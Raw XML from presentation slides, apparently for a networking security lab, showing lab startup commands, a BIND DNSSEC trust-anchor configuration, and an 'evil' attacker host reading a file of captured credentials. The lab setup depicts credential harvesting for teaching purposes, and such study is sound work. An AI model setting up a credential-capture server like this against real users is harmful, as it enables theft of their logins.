            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50CE517C-1BF6-0183-1E3C-CB611CE73B6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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110.0.0.50/24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default via 110.0.0.3</a:t>
              </a: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/var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a: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www-data:www-data</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a: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777 /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</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rm -f /var/www/html/index.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>apache2ctl start</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tail -f /dev/null</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F776031B-4CBD-6ADC-EB86-8FD38FE9CDB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2716" cy="134"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 28132"/>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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6EA2F5-910C-88FD-01FC-24F47B583B4D}"/>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F125EA90-53E9-14B7-B4B6-4D19F3B7EEB2}"/>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0F6BD11E-0452-434B-0388-398331CC045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38384821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9B4D6-D420-3DAB-F20B-61CEC68DCCB0}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C0F7EF2-3E24-14C6-F5D3-66B79742794B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>trust-anchors view</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FBA045-1466-4FF3-CBB8-92072BC82D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pc4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>let's see the trust-anchors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1018146E-F54E-4653-8C3C-2402B9CF9A68}"/>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34235345-A996-7D19-F1C3-BFE796DE3C8D}"/>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7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897E6250-D913-4037-F2EE-F2C8AF23F202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2748056"/>
            <a:ext cx="10972799" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B72B384-6A8B-C0B4-3499-7DBC9FEDD9C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="257206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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>trust-anchors { "." static-key 257 3 13 "wu8ma9EvxFhISJabP7+JOBwn/geejdepyV4WVi5Uv0Tn80KNQfpAuDeNhKEunT5pmUXjIx/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rkdOiK</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xApdQNEg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=="; };</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028E44F8-7B45-6936-DF02-E1D8804A38F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506"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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C424553-3C54-0CB3-A99C-5C90AF00EFA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E380453-112D-D145-202A-AECFF3D174F7}"/>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2" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64CD22CB-937C-01A4-CE03-8E68684DFAF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3" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7622DA6C-4446-1148-4DAE-5DE6DDD86017}"/>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40267673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F1B19-D613-2FF0-7CFD-C0689E1DEB5E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14453FB6-7C56-6BF6-1FF7-F3F58292B6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF988FF3-5F4D-C0A3-0934-D0864348C5AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="123199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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE51263E-1C2B-A1EC-54C0-0FB9E484450A}"/>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evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E8A7B5-7F95-6C09-4DEF-85AB19E890FD}"/>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B57FD093-3430-D49F-21D6-A342A497B04B}"/>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6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9649AA0F-E1E9-F727-F6CE-475F1FD64649}"/>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40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F482323E-A117-9FB7-8D79-ADC2341B64B2}"/>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21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEBE911E-400F-10F8-11C0-8A5A11EADA36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62FFD05-B4F9-65DB-A820-B1B802BE4A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C1EF3E-0A1D-6BDD-F1F8-53C81550C1F7}"/>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21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62223B47-0EC1-B937-66CE-23DEB8C18697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822"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800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26652961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B6007-A2AD-DB95-8297-D603C566461A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC801E2D-5942-F1CA-0D59-EB302024E37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9B58B9C-D18D-7FD5-5745-1838CCB21F48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="123199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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>--- CAPTURE ---</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39800E7D-60C0-0C40-7CF3-85A7253AE97E}"/>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evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C781E1-26F0-E617-5B0A-EED0E167F6E2}"/>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AA9EE7A9-5D63-B2C0-B142-D4E0BA43A2C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6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74E03ACF-FC56-2093-FA38-F177F99D088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40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D0301F-F511-C652-20CF-73E12755440E}"/>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21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC7F136-A1BF-D5B1-B198-349E84FD227B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
